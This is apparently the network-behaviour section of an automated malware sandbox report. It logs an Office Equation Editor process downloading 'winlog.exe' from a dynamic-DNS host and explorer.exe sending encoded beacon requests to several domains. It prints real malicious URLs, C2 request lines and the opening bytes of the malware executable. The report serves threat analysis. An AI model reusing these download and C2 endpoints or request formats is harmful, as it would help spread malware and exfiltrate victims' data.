                                                                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      11/26/20-09:01:24.634313TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 26, 2020 09:00:23.357465029 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:23.581357002 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:23.581557035 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:23.581810951 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:23.805932999 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:23.806014061 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:23.806057930 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:23.806096077 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:23.806238890 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:23.806289911 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.028904915 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.028935909 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.028947115 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.028958082 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.028969049 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.028980017 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.028990984 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.029001951 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.029870987 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.252491951 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252542019 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252557039 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252572060 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252585888 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252599955 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252614021 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252638102 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252652884 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252672911 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252692938 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252715111 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.252813101 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.252854109 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.257903099 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.475923061 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.475954056 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.475975037 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.475996017 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476015091 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476033926 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476052999 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476078033 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476099968 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476119995 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476135015 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476150036 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476170063 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.476274967 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.476324081 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.476330996 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477031946 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477054119 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477075100 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477093935 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477116108 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477124929 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477135897 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.477143049 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477169037 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.477215052 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.480289936 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.698900938 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.698960066 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.698998928 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699037075 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699074984 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699120998 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699167967 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699207067 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699219942 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699245930 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699254990 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699260950 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699265003 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699285984 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699299097 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699323893 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699353933 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699362993 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699368000 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699400902 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699424028 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699450016 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699461937 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699492931 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699512959 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699531078 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699543953 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699568987 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699588060 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699606895 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699620962 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699644089 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699666977 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699687004 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699709892 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699718952 CET4916780192.168.2.22103.141.138.87
                                                                                                                                      Nov 26, 2020 09:00:24.699724913 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699771881 CET8049167103.141.138.87192.168.2.22
                                                                                                                                      Nov 26, 2020 09:00:24.699788094 CET4916780192.168.2.22103.141.138.87

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 26, 2020 09:00:23.305349112 CET5219753192.168.2.228.8.8.8
                                                                                                                                      Nov 26, 2020 09:00:23.341093063 CET53521978.8.8.8192.168.2.22
                                                                                                                                      Nov 26, 2020 09:01:24.294477940 CET5309953192.168.2.228.8.8.8
                                                                                                                                      Nov 26, 2020 09:01:24.484945059 CET53530998.8.8.8192.168.2.22
                                                                                                                                      Nov 26, 2020 09:01:44.808792114 CET5283853192.168.2.228.8.8.8
                                                                                                                                      Nov 26, 2020 09:01:44.848503113 CET53528388.8.8.8192.168.2.22
                                                                                                                                      Nov 26, 2020 09:02:05.723607063 CET6120053192.168.2.228.8.8.8
                                                                                                                                      Nov 26, 2020 09:02:06.065185070 CET53612008.8.8.8192.168.2.22

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      Nov 26, 2020 09:00:23.305349112 CET192.168.2.228.8.8.80x7ddbStandard query (0)wsdyneverwalkachinese2loneinlifekwsfnv.ydns.euA (IP address)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:01:24.294477940 CET192.168.2.228.8.8.80xa14dStandard query (0)www.lygosfilms.infoA (IP address)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:01:44.808792114 CET192.168.2.228.8.8.80x2e78Standard query (0)www.paletciniz.comA (IP address)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:02:05.723607063 CET192.168.2.228.8.8.80x2f03Standard query (0)www.annaothomas.comA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      Nov 26, 2020 09:00:23.341093063 CET8.8.8.8192.168.2.220x7ddbNo error (0)wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu103.141.138.87A (IP address)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:01:24.484945059 CET8.8.8.8192.168.2.220xa14dNo error (0)www.lygosfilms.infolygosfilms.infoCNAME (Canonical name)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:01:24.484945059 CET8.8.8.8192.168.2.220xa14dNo error (0)lygosfilms.info34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:01:44.848503113 CET8.8.8.8192.168.2.220x2e78No error (0)www.paletciniz.compaletciniz.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:01:44.848503113 CET8.8.8.8192.168.2.220x2e78No error (0)paletciniz.com160.153.138.53A (IP address)IN (0x0001)
                                                                                                                                      Nov 26, 2020 09:02:06.065185070 CET8.8.8.8192.168.2.220x2f03No error (0)www.annaothomas.com104.164.99.242A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
                                                                                                                                      • www.lygosfilms.info
                                                                                                                                      • www.paletciniz.com
                                                                                                                                      • www.annaothomas.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.2249167103.141.138.8780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 26, 2020 09:00:23.581810951 CET0OUTGET /chnsfrnd2/winlog.exe HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                      Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 26, 2020 09:00:23.805932999 CET2INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 26 Nov 2020 08:00:28 GMT
                                                                                                                                      Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                      Last-Modified: Wed, 25 Nov 2020 21:20:21 GMT
                                                                                                                                      ETag: "61800-5b4f4feb1ea84"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 399360
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea aa c2 b4 ae cb ac e7 ae cb ac e7 ae cb ac e7 b0 99 28 e7 b4 cb ac e7 b0 99 39 e7 be cb ac e7 89 0d d7 e7 bf cb ac e7 ae cb ad e7 d8 cb ac e7 b0 99 2f e7 e7 cb ac e7 b0 99 38 e7 af cb ac e7 b0 99 3d e7 af cb ac e7 52 69 63 68 ae cb ac e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 ca be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 f6 04 00 00 00 00 00 97 35 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 06 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 b4 00 00 00 00 a0 04 00 a8 89 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 d0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 5c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 29 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bc 2b 00 00 00 40 01 00 00 2c 00 00 00 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 28 03 00 00 70 01 00 00 1e 03 00 00 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 89 01 00 00 a0 04 00 00 8a 01 00 00 78 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c2 14 00 00 00 30 06 00 00 16 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(9/8=RichPEL_*5@@P@a0X\@@.text)* `.rdata+@,.@@.data`(pZ@.rsrcx@@.reloc0@B


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      1192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 26, 2020 09:01:24.518790007 CET419OUTGET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
                                                                                                                                      Host: www.lygosfilms.info
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Nov 26, 2020 09:01:24.634313107 CET420INHTTP/1.1 403 Forbidden
                                                                                                                                      Server: openresty
                                                                                                                                      Date: Thu, 26 Nov 2020 08:01:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 275
                                                                                                                                      ETag: "5fb7c9ca-113"
                                                                                                                                      Via: 1.1 google
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      2192.168.2.2249169160.153.138.5380C:\Windows\explorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 26, 2020 09:01:44.896217108 CET420OUTGET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
                                                                                                                                      Host: www.paletciniz.com
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Nov 26, 2020 09:01:45.518532038 CET422INHTTP/1.1 404 Not Found
                                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      X-Cacheable: YES:Forced
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Date: Thu, 26 Nov 2020 08:01:45 GMT
                                                                                                                                      Age: 0
                                                                                                                                      Connection: close
                                                                                                                                      Vary: User-Agent
                                                                                                                                      X-Cache: uncached
                                                                                                                                      X-Cache-Hit: MISS
                                                                                                                                      X-Backend: all_requests
                                                                                                                                      Data Raw: 30 30 37 65 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 2f 31 36 30 2e 31 35 33 2e 31 33 38 2e 35 33 2f 6f 76 7a 2e 64 30 33 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 35 2e 33 26 23 30 33 38 3b 74 69 6d
                                                                                                                                      Data Ascii: 007e8a<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Sayfa bulunamad &#8211; Paletciniz.com</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Paletciniz.com &raquo; beslemesi" href="http://www.paletciniz.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Paletciniz.com &raquo; yorum beslemesi" href="http://www.paletciniz.com/comments/feed/" /><link rel='preconnect' href='https://secureservercdn.net' crossorigin /><link rel='stylesheet' id='wp-block-library-css' href='https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3&#038;tim


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      3192.168.2.2249170104.164.99.24280C:\Windows\explorer.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 26, 2020 09:02:06.235939980 CET455OUTGET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
                                                                                                                                      Host: www.annaothomas.com
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii:
                                                                                                                                      Nov 26, 2020 09:02:06.403984070 CET456INHTTP/1.1 200 OK
                                                                                                                                      Transfer-Encoding: chunked
